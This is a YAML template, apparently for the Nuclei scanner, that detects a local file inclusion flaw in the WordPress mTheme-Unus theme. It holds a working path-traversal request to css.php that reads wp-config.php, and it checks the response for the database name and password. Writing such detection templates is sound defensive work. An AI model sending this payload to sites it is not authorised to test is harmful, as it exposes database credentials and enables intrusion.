id: mthemeunus-lfi

info:
  name: WordPress mTheme-Unus Theme - Local File Inclusion
  author: dhiyaneshDk
  severity: high
  description: WordPress mTheme-Unus Theme is vulnerable to local file inclusion via css.php.
  reference:
    - https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb
    - https://packetstormsecurity.com/files/133778/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wpscan,packetstorm,wordpress,wp-theme,lfi,mtheme

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/05
